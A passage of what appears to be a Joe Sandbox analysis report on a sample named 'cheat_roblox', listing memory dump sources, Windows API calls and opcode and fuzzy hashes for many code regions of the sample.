                                                                              • Instruction Fuzzy Hash: 0D91A073A18B81D0EF20DF24D4462ED63A9FB84798F904176EA5CA7AE9DF78D546C300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: 21a43ee9d5bb3ff193924d88485a13e88477ac686680c8540aa6de97187d4b2e
                                                                              • Instruction ID: 27e414fbd2abe5ae90678364e440fc8b777aac2ff5619519e1c33d5adec35ef7
                                                                              • Opcode Fuzzy Hash: 21a43ee9d5bb3ff193924d88485a13e88477ac686680c8540aa6de97187d4b2e
                                                                              • Instruction Fuzzy Hash: C941AC62F1865284FF21DAB1D4423BD2368EF44B98F145276EE1DB7B9ADE3894828300
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF693E6274D), ref: 00007FF693E628A9
                                                                              • GetLastError.KERNEL32(?,00007FF693E6274D), ref: 00007FF693E628B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                              • Instruction ID: 7ecf36d46a7425c9de13f12fa9876d001acbd4554b7a7fa3580834d045cb847e
                                                                              • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                              • Instruction Fuzzy Hash: E3319722B1965682EE704F2AD9426F93358EF44BD8F145172DF1DA77A0DE3CE8418740
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1746051919-0
                                                                              • Opcode ID: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                              • Instruction ID: 8143473a3a59488ee645aeeb5ea256e45df6cbb525f06223c1b22ec1f110d95c
                                                                              • Opcode Fuzzy Hash: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                              • Instruction Fuzzy Hash: DE31B222A1874682EE249F15F44637E7368EF94790F444272EB9CA7B95DF3CF5408704
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlushTime
                                                                              • String ID:
                                                                              • API String ID: 1392018926-0
                                                                              • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                              • Instruction ID: 7595ce41b9a9a1ba4d353b59d7709df13a44fe7f15430385692e5b975d6fec11
                                                                              • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                              • Instruction Fuzzy Hash: 7821C422F0DB4651EA728E11D4167BA7798EF41798F1580B6DF4C66295EE3CD486C300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString
                                                                              • String ID:
                                                                              • API String ID: 2948472770-0
                                                                              • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                              • Instruction ID: 8a4bd8ea26505428b7dd24528126bd3e0ec88ade881de0658c11bc5a48b6a536
                                                                              • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                              • Instruction Fuzzy Hash: 11118BB0B1874186EA218F17A84202977B9FB89FC4B54497ACA0DF7720EF7CE9418744
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                              • Instruction ID: 929557061a03304c8d57f1ae2a473974530362a382fcb5d4ee2dd751934a7ea5
                                                                              • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                              • Instruction Fuzzy Hash: EC118121A1864281FB708B25E8426797368FB54BB8F544373DB7DA62E5CF3DE996C300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$RectText$ClientWindowswprintf
                                                                              • String ID:
                                                                              • API String ID: 402765569-0
                                                                              • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                              • Instruction ID: 10396bc8310826f521b280b0b17ed0df28a96d7c88cfa354cdcc1d8b28c07f37
                                                                              • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                              • Instruction Fuzzy Hash: EB017120E0D34A42FF7A5B52A46A27957A9EF85744F0800B7E94DEA3D9DE2CF984C301
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF693E6EBAD,?,?,?,?,00007FF693E65752,?,?,?,00007FF693E656DE), ref: 00007FF693E6EB5C
                                                                              • GetProcessAffinityMask.KERNEL32 ref: 00007FF693E6EB6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AffinityCurrentMask
                                                                              • String ID:
                                                                              • API String ID: 1231390398-0
                                                                              • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                              • Instruction ID: d4d94d8a44e31e49bbfbcfcd04369a1333a542399515d493f2bb96799a1a66fe
                                                                              • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                              • Instruction Fuzzy Hash: E6E02B61F2464A42DF288F56D4425E97396FFC8B40B848037E60BD3624DE2CE5458B00
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 1173176844-0
                                                                              • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                              • Instruction ID: eeeee8731ff8fdd8a1b8ccd65068bcabeec2ac72cafeb358d5cb5cfc2d84aecd
                                                                              • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                              • Instruction Fuzzy Hash: EBE01740E0E10B46FD38627618271B4008CCF29370E2C1BB2DE7EF92D3AE2CE4A28210
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                              • String ID:
                                                                              • API String ID: 588628887-0
                                                                              • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                              • Instruction ID: 9b025473eb6c232fb3bb9c1cb66d7a47a9543b69a7695d99bd4cf3c854b8b9f1
                                                                              • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                              • Instruction Fuzzy Hash: 84E0E650E0964787FF356FB2984717912DADF94755F0440B6D90DE6352DE2C94868701
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: f7206296fbad731e13628bf389820051144a1fb1724d87213a35627401b5a090
                                                                              • Instruction ID: 8031a47841ec86b36ba7eebbc37eef7049a90fad2d35778315ceb6a7d8ccb7d6
                                                                              • Opcode Fuzzy Hash: f7206296fbad731e13628bf389820051144a1fb1724d87213a35627401b5a090
                                                                              • Instruction Fuzzy Hash: C2D1B472B0968696EF7ACB2596423B967A9FB05BC4F0400B7CB1DD77A1CF38E4658700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1017591355-0
                                                                              • Opcode ID: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                              • Instruction ID: ef5d0c19903c29f65357f2c4fe2fa3e7dc3fc8984f11bb49920e25089e7f67dc
                                                                              • Opcode Fuzzy Hash: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                              • Instruction Fuzzy Hash: B961D651F0C64782FA749A16841F27E7299EF85BD8F1441B3DF4EE6AC9EE6CF4418200
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E6E948: ReleaseSemaphore.KERNEL32 ref: 00007FF693E6E974
                                                                                • Part of subcall function 00007FF693E6E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF693E6E993
                                                                                • Part of subcall function 00007FF693E6E948: DeleteCriticalSection.KERNEL32 ref: 00007FF693E6E9AA
                                                                                • Part of subcall function 00007FF693E6E948: CloseHandle.KERNEL32 ref: 00007FF693E6E9B7
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E71ACB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1624603282-0
                                                                              • Opcode ID: 9a6db190a7b2ced1a532e1e2deef49cadd1901ccf5d6799b3b9573806cc4e890
                                                                              • Instruction ID: 7f00df26749bd74ec6c7495e09a04c0104dacaedf32c3349f74c03dfa5341581
                                                                              • Opcode Fuzzy Hash: 9a6db190a7b2ced1a532e1e2deef49cadd1901ccf5d6799b3b9573806cc4e890
                                                                              • Instruction Fuzzy Hash: F2619162B15B8592EE28DB65D5560BC7369FF40F94B544273EB2EA7AC2CF2CE4718300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: a095aec0443fd8cf801f98afcb412b518cb1d8a0794272d33745bf5c125c604f
                                                                              • Instruction ID: 4a8161f3e1f1ab30c54394ac2ac5e87fb7db74b186944879cb428696db237cbb
                                                                              • Opcode Fuzzy Hash: a095aec0443fd8cf801f98afcb412b518cb1d8a0794272d33745bf5c125c604f
                                                                              • Instruction Fuzzy Hash: F751C162A1868280EE249B2594463F92799FB85BC8F4401B3EF4DE7396CF3DE485C300
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E63EC8: FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5E993
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1011579015-0
                                                                              • Opcode ID: 1fe2d1bf2adfaa81e5c33c8572439b09bd5b189cc72c519e038d04c62312892d
                                                                              • Instruction ID: b6a85e4cf37f4820224400b7fd4ac31404c1d666e2b99c97af48874225824b6e
                                                                              • Opcode Fuzzy Hash: 1fe2d1bf2adfaa81e5c33c8572439b09bd5b189cc72c519e038d04c62312892d
                                                                              • Instruction Fuzzy Hash: 67516C22A0878681FE708F25D4463BD63A9FB84B94F4401B7EA8DE77A5CF2CE841D350
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                              • String ID:
                                                                              • API String ID: 3947729631-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 680105476-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID:
                                                                              • API String ID: 3215553584-0
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E7F0A4: GetDlgItem.USER32 ref: 00007FF693E7F0E3
                                                                                • Part of subcall function 00007FF693E7F0A4: ShowWindow.USER32 ref: 00007FF693E7F109
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F11E
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F136
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F157
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F173
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1B6
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1D4
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1E8
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F212
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F22A
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E7FD03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 4003826521-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E81604: GetModuleHandleW.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E8162B
                                                                              • DloadProtectSection.DELAYIMP ref: 00007FF693E815C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DloadHandleModuleProtectSection
                                                                              • String ID:
                                                                              • API String ID: 2883838935-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
